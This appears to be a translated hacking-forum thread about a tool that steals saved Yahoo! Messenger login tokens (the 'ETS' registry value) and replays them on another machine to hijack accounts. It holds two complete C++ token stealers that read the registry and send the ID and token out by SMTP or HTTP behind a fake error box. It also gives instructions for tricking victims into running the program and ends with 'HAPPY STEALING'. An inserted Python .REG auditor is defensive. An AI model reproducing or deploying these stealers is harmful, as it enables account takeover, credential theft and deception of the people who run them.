Guest chri5ty

ETS Hijacker


Guest chri5ty
Posted (edited)

This is probably the simplest way to break into a Messenger account. To hell with keyloggers... binders... FTPs... all of that just to steal a password...

When you log in to Yahoo! Messenger, you have the option to save the ID and password for later logins. The ID is saved in the registry, and so is a code, ETS, in which the authentication token is stored. The password cannot be extracted from the token.

What does that mean? If you extract those 2 pieces of information from the registry and then "plant" them on another computer, you'll be surprised to find that you can log in with the saved ID and password, i.e. into someone else's account, without necessarily learning their password.

Simple, isn't it?

I wrote a small exe in C++, which you can find archived here. When it is run, it extracts the ID and the ETS and sends them to a server. You can find a few explanations in English here.

Give the exe to someone and convince them to open it. The program will display a fake error message. Go to http://it.octopis.com/ets.php, type in the ID, and see whether the operation succeeded. If it did, the ID and the ETS code will be displayed. Click the ID to download a .REG file, which you then run. Open Messenger and surprise!! You're logged in with that ID! You have access to the whole Yahoo! account + since you have access to the e-mail account, you can break into their hi5 / netlog / tagged accounts (+ other crappy sites)...

HAPPY STEALING!

The program is small and based on a very simple principle, and I'm keeping the source under lock and key, for the curious.

The site it.octopis.com is my site, so it doesn't hurt to take a look. I've put up 3-4 little programs and I'm too lazy... to add a few more.

Edited by chri5ty
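The .REG import step described above, as an added example that is not part of the original post: a Python parser for the Regedit Version 5.00 export format and an audit that reports any persisted "Yahoo! User ID" / "ETS" pair it finds, which is the check an incident responder would run over an exported hive or a suspicious .REG attachment. The embedded sample export is constructed and its ETS strings are dummies; matching HKEY_USERS\<SID>\Software\Yahoo\Pager as well as HKEY_CURRENT_USER is an assumption beyond the thread, which names only the latter.

```python
r"""Parse a Regedit 5.00 .REG export and report persisted Yahoo! Messenger logins.

Added example, not code from the thread. The thread describes a .REG file that
drops "Yahoo! User ID" and "ETS" under HKEY_CURRENT_USER\Software\Yahoo\Pager;
this parses such a file offline and flags those value pairs. SAMPLE_REG below
is constructed, and the ETS strings in it are dummies, not real tokens.
"""
import re

# Suffix match so an export of another profile's hive (HKEY_USERS\<SID>\...)
# is caught as well (assumption: the thread names only HKEY_CURRENT_USER).
PAGER_SUFFIX = r"\software\yahoo\pager"

_ENTRY_RE = re.compile(r'^(?:"((?:[^"\\]|\\.)*)"|@)=(.*)$')
_HEX_RE = re.compile(r"hex(?:\((\w+)\))?:(.*)$")


def _unescape(s):
    """Undo regedit's two in-string escapes (backslash-backslash, backslash-quote)."""
    return re.sub(r'\\(["\\])', r"\1", s)


def _decode_hex(kind, payload):
    """hex(1)/hex(2)/hex(7) are UTF-16LE strings on export; anything else stays bytes."""
    raw = bytes(int(b, 16) for b in payload.replace(",", " ").split())
    if kind in ("1", "2", "7"):
        text = raw.decode("utf-16-le", errors="replace").rstrip("\x00")
        return text.split("\x00") if kind == "7" else text
    return raw


def parse_reg(text):
    """Return {key_path: {value_name: value}}; a deleted key or value maps to None."""
    logical, buf = [], ""
    for line in text.lstrip("\ufeff").splitlines():
        line = line.strip()
        if line.endswith("\\"):            # regedit wraps long hex values with '\'
            buf += line[:-1]
            continue
        logical.append(buf + line)
        buf = ""
    keys, current = {}, None
    for line in logical:
        if not line or line[0] == ";" or line.startswith("Windows Registry Editor"):
            continue
        if line[0] == "[" and line[-1] == "]":
            name = line[1:-1]
            if name.startswith("-"):
                keys[name[1:]], current = None, None   # [-key] deletes the key
            else:
                current = keys.setdefault(name, {})
            continue
        m = _ENTRY_RE.match(line)
        if m is None or current is None:
            continue                        # junk, or a value outside any key
        name = "@" if m.group(1) is None else _unescape(m.group(1))
        rhs = m.group(2).strip()
        if rhs == "-":
            current[name] = None            # "name"=- deletes the value
        elif len(rhs) >= 2 and rhs[0] == '"' and rhs[-1] == '"':
            current[name] = _unescape(rhs[1:-1])
        elif rhs.startswith("dword:"):
            current[name] = int(rhs[6:], 16)
        elif rhs.startswith("hex"):
            h = _HEX_RE.match(rhs)
            current[name] = _decode_hex(h.group(1) or "3", h.group(2))
        else:
            current[name] = rhs             # unknown form: keep verbatim
    return keys


def find_persisted_yahoo_logins(reg_text):
    """Return [(key_path, user_id, ets)] for every Pager key carrying either value."""
    hits = []
    for path, values in parse_reg(reg_text).items():
        if values is None or not path.lower().endswith(PAGER_SUFFIX):
            continue
        user_id, ets = values.get("Yahoo! User ID"), values.get("ETS")
        if user_id is not None or ets is not None:
            hits.append((path, user_id, ets))
    return hits


# Constructed sample: the HKCU drop from the thread, plus an HKEY_USERS hive
# export in the hex(1) form regedit emits, a wrapped line, and a deleted key.
SAMPLE_REG = r'''Windows Registry Editor Version 5.00

; dummy values, not real tokens
[HKEY_CURRENT_USER\Software\Yahoo\Pager]
"Yahoo! User ID"="victim_example"
"ETS"="ETSDUMMY1"
"Unrelated"=dword:00000001

[HKEY_CURRENT_USER\Software\Yahoo\Pager\profiles]
"Note"="has \"quotes\" and a \\ backslash"

[-HKEY_CURRENT_USER\Software\Yahoo\Pager\stale]

[HKEY_USERS\S-1-5-21-1-2-3-1001\Software\Yahoo\Pager]
"Yahoo! User ID"=hex(1):76,00,69,00,63,00,74,00,69,00,6d,00,32,00,00,00
"ETS"=hex(1):45,00,54,00,53,00,44,00,55,00,4d,00,4d,00,59,00,\
  32,00,00,00
'''

if __name__ == "__main__":
    for path, user_id, ets in find_persisted_yahoo_logins(SAMPLE_REG):
        print(f"{path}: id={user_id!r} ets={ets!r}")
```

Regedit writes exports as UTF-16LE with a BOM, so decode the file with that encoding before passing the text in. The finding is the presence of the pair, not its content: the token is opaque, as the post says, so there is nothing further to decode from it.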
Guest chri5ty
Posted
If you don't show us the source too, you're not TRU.

I explained in detail what it does. Browse the registry, your hand won't fall off. Locate the 2 keys and write the code yourselves. Mine all fit in 15 lines. :rolleyes: Maybe I'll post the source. The idea was for each of you to think about how it's done, because otherwise some "Copy/Paste" type comes along and adds the code fragment to his program, then brags about it being who knows what hacking tool of his, a "ni-no-ni-no" trojan, absolutely spectacular, when the program at hand is "simply too simple".

interesting stuff.. but you practically have access to all the IDs in there...

Exactly. On the page where you search, I have a few secret parameters through which I see the list of IDs. When I had 10-20 entries I still looked through them, and sometimes I saw that they belonged to people who didn't deserve to get "slapped" by some brat a few years old who took it into his head to break into their account. Since I've had 50 of them, I'm really not interested in trying every ID anymore.

and unless you make your own you'll be labelled a script kiddie

What exactly are you referring to?

chri5ty only 17 years old?:OO You're insanely good at this age!!

16.5 years, thank you.. I started with HTML in 5th grade, Pascal in 6th, and C in 7th. In 9th grade, during the summer break, i.e. last summer, I learned C++ to perfection. :D:cool:

Posted (edited)

Ok nice program

I enable Deep Freeze or VMware, run it without an internet connection, extract the MVC++ executable after installation, decompile it and presto, the source code... big deal for those who want the source... try making it in Pascal or Delphi and you're "the daddy"

The question is this: if the victim runs it without a net connection, what happens? Is the log file with the login data "stored" somewhere on the HDD, and when it "sees" a bit of net it sends the data?

Edited by zaiet-pagadi
Guest chri5ty
Posted

What do you need Deep Freeze for? (haha) It's a microscopic executable and I guarantee that it does what it says. If there's no net connection, nothing is stored. I wasn't interested in that aspect at all.

And I don't think you can decompile it. Maybe only if you disassemble it. And even so, you'd only be proving to me that you lack a ton of creativity. It's very simple, damn it! I'm addressing programmers of a below-average level, or at least average.

Posted
// Token stealer posted in the thread: reads the two saved Yahoo! Pager values
// from HKCU and mails them out over a raw SMTP session to Yahoo's MX.
// Cleaned up to compile (headers and link pragmas added, unused globals
// dropped, reply buffer kept NUL-terminated, socket closed) with comments;
// the behaviour described in the thread is unchanged.
#include <winsock2.h>
#include <windows.h>
#include <iostream>
#include <cstring>
#pragma comment(lib, "ws2_32.lib")
#pragma comment(lib, "advapi32.lib")
using namespace std;

char data[1000];       // "<ETS> <Yahoo! User ID> " gathered from the registry
char bufferout[1000];  // next SMTP command
char bufferin[1000];   // last SMTP reply
char ip[100];
char mail[100];        // recipient, "<addr>\n"
int port;
SOCKET bsock;
SOCKADDR_IN sinb;
WSADATA wsadata;

// Read REG_SZ value `key` under `folder` and append it plus a space to `data`.
int checkKey(HKEY tree, const char *folder, const char *key) {
    long lRet;
    HKEY hKey;
    char temp[150];
    DWORD dwBufLen;

    // Open location
    lRet = RegOpenKeyEx(tree, folder, 0, KEY_QUERY_VALUE, &hKey);
    if (lRet != ERROR_SUCCESS)
        return 0;

    // Get value (assumed REG_SZ; a value longer than temp fails with ERROR_MORE_DATA)
    dwBufLen = sizeof(temp);
    lRet = RegQueryValueEx(hKey, key, NULL, NULL, (BYTE*)temp, &dwBufLen);
    if (lRet != ERROR_SUCCESS) {
        RegCloseKey(hKey);
        return 0;
    }
    strcpy(data + strlen(data), temp);
    data[strlen(data)] = ' ';   // data is zero-filled, so the string stays terminated

    // Close key
    lRet = RegCloseKey(hKey);
    if (lRet != ERROR_SUCCESS)
        return 0;

    // Got this far, then key exists
    return 1;
}

// Only a 421 ("service not available") reply triggers a reconnect; 220/250 and
// anything else, including 4xx/5xx rejections, count as success.
int errorcheck() {
    if (bufferin[0]=='2' && bufferin[1]=='2' && bufferin[2]=='0') return 1;
    if (bufferin[0]=='2' && bufferin[1]=='5' && bufferin[2]=='0') return 1;
    if (bufferin[0]=='4' && bufferin[1]=='2' && bufferin[2]=='1') return 0;
    return 1;
}

// Receive one reply into bufferin, NUL-terminated, and echo it.
void readReply() {
    memset(bufferin, 0, sizeof(bufferin));
    recv(bsock, bufferin, sizeof(bufferin) - 1, 0);
    cout << bufferin;
}

int main()
{
    strcpy(mail, "<mailto@yahoo.com>\n");   // recipient for RCPT TO
    memset(data, 0, sizeof(data));
    checkKey(HKEY_CURRENT_USER, "Software\\Yahoo\\Pager", "ETS");
    checkKey(HKEY_CURRENT_USER, "Software\\Yahoo\\Pager", "Yahoo! User ID");

login:
    strcpy(ip, "67.195.168.31"); port = 25;   // a Yahoo MX at the time of posting
    WSAStartup(0x101, &wsadata);
    bsock = socket(AF_INET, SOCK_STREAM, 0);

    sinb.sin_family = AF_INET;
    sinb.sin_addr.s_addr = inet_addr(ip);
    sinb.sin_port = htons(port);
    connect(bsock, (SOCKADDR*)&sinb, sizeof(SOCKADDR_IN));   // result unchecked
    readReply();                                             // 220 greeting
    Sleep(200); cout << "\n";
    if (!errorcheck()) { cout << "restart"; closesocket(bsock); WSACleanup(); goto login; }
    else cout << "Connected.\n";
    Sleep(30);

    // No HELO/EHLO is sent, and command lines end in bare LF rather than the
    // CRLF RFC 5321 requires; whether an MTA accepts that is up to the MTA.
    // MAIL FROM
    strcpy(bufferout, "MAIL FROM: <ethereal@yahoo.com>\n");
    cout << "\n\n" << bufferout << " " << strlen(bufferout) << "\n\n";
    send(bsock, bufferout, strlen(bufferout), 0);
    readReply();

    // RCPT TO
    strcpy(bufferout, "RCPT TO: ");
    strcat(bufferout, mail);
    cout << bufferout;
    send(bsock, bufferout, strlen(bufferout), 0);
    readReply();

    // DATA: headers, blank line, then the registry values as the body
    strcpy(bufferout, "DATA\n");
    send(bsock, bufferout, strlen(bufferout), 0);
    readReply();
    Sleep(30);
    strcpy(bufferout, "FROM:ethereal@yahoo.com\n \nSubject: Token stealer\n\n\n");
    strcat(bufferout, data);
    strcat(bufferout, "\n");
    send(bsock, bufferout, strlen(bufferout), 0);

    // End of message, then QUIT
    strcpy(bufferout, "\r\n.\r\n");
    send(bsock, bufferout, strlen(bufferout), 0);
    readReply();
    strcpy(bufferout, "quit\n");
    send(bsock, bufferout, strlen(bufferout), 0);
    closesocket(bsock);
    WSACleanup();

    cout << "\nEnd of the world.";
    cin.get();
}

Posted (edited)

Edited...

let me not bother my head... try to take other people's advice into account too, you've got nothing to lose

Edited by zaiet-pagadi
Guest chri5ty
Posted

I sent the parameters via URLDownloadToFile. The URL is a PHP script on the site + parameters, and the destination file is left unspecified.

@zaiet-pagadi - I don't understand, what do you mean?

Guest chri5ty
Posted
I ran it but the nick didn't show up on that page

Meaning what? What doesn't show up for you?

If you meant that you searched and found nothing for that ID, then it's possible that the person you gave the program to uses multi-mess, in which case they didn't tick "remember my id and password".

Posted

Please, could you specify the source?

[quotes the source posted above]

If this is it, tell me how you compile it, AutoIt, C++? Or please give me the source, I'd like to make a site like that too

Guest chri5ty
Posted

// chri5ty's variant: reads the same two values and reports them as query
// parameters of a single HTTP GET via URLDownloadToFile, then shows a fake
// error box. Cleaned up to compile (urlmon.h/string.h added, WINAPI on
// WinMain, buffer sizes passed explicitly) with comments; the URL fragments
// masked by the author stay masked.
#include <windows.h>
#include <urlmon.h>
#include <stdio.h>
#include <string.h>
#pragma comment(lib,"user32.lib")
#pragma comment(lib,"Urlmon.lib")
#pragma comment(lib,"advapi32.lib")

// Read REG_SZ value `Key` under HKCU\`Path` into `buffer` (at most `size` bytes).
void getKey(LPCSTR Path, LPCSTR Key, void *buffer, DWORD size) {
    HKEY key; DWORD type = REG_SZ;
    if (RegOpenKeyEx(HKEY_CURRENT_USER, Path, 0, KEY_READ, &key) != ERROR_SUCCESS) return;
    RegQueryValueEx(key, Key, NULL, &type, (LPBYTE)buffer, &size);
    RegCloseKey(key);
}

int WINAPI WinMain(HINSTANCE, HINSTANCE, LPSTR, int) {
    char buf[1024] = "";
    char URL[1024] = "****************";   // script URL + first parameter, masked by the author
    // The user ID goes straight after the masked prefix, the ETS after a second masked fragment
    getKey("Software\\yahoo\\pager", "Yahoo! User ID", URL + strlen(URL), (DWORD)(sizeof(URL) - strlen(URL)));
    getKey("Software\\yahoo\\pager", "ETS", buf, sizeof(buf));
    strcat(URL, "********");   // unchecked: total length must stay under sizeof(URL)
    strcat(URL, buf);
    if (strlen(buf)) {
        // Empty destination path: the response is thrown away, only the request matters
        URLDownloadToFile(0, URL, "", 0, 0);
        MessageBox(0, "Application failed to initialize", "Fatal Error", MB_ICONSTOP);
    } else MessageBox(0, "Unexpected error in main module", "Fatal Error", MB_ICONSTOP);
    return 0;
}

I hid a few parameters under ***, so that the database doesn't get flooded. There is a password for entries to be accepted.

Posted

I have a question too... if a person ran that program... and another person is using their mail... how can the person who is the victim get out of it? reinstall Windows? ... or?

Guest chri5ty
Posted

You replace the ****** with some URL fragments, so that in the end you get a URL of the form "http://sait.com/cale/script.php?parametru=valoare&parametru=valoare...."

It's simpler than it seems, but I won't spell out the parameters on the forum, so that nobody can automatically bloat the database with thousands of meaningless entries. The PHP script is just as simple as the program.

There's really too much discussion on this topic. I only needed to give you the idea, and you were to make your own programs yourselves.

Posted

Virus: HEUR/Malware

Type: AHeAD Heuristic special detection

In the wild: No

Reported Infections: Low

Distribution Potential: Low

Damage Potential: Low

Static file: No

Description:

HEUR/Malware

HEUR/Malware is a heuristic detection routine designed to detect common malware characteristics. Avira AntiVir recognizes unknown malware proactively using its AHeAD technology. To achieve this, Avira performs innovative structural analysis.

On the basis of the composition of a file, the sequence of significant code sequences or based on particular behavior patterns, the heuristics can determine with a high probability whether it is dealing with a harmful or virulent file.

HEUR/Malware in particular is reported when a program seems to contain suspicious functionality.

In the unlikely event of a false positive, we would kindly ask for your help: send the file to our virus lab using the quarantine functionality of AntiVir.

A heuristic detection might be a false identification if one or more of the following are true:

- The program has been used for a very long time and is known to the user

- The program was installed by the user himself

- The program is from a trustworthy source

Please note that even old programs can get infected or replaced by malware without your knowledge. Besides that trustworthy sources might have become compromised themselves.

In order to enhance detection and reduce the rate of false positives, we recommend that you send the file to our virus lab for further analysis.
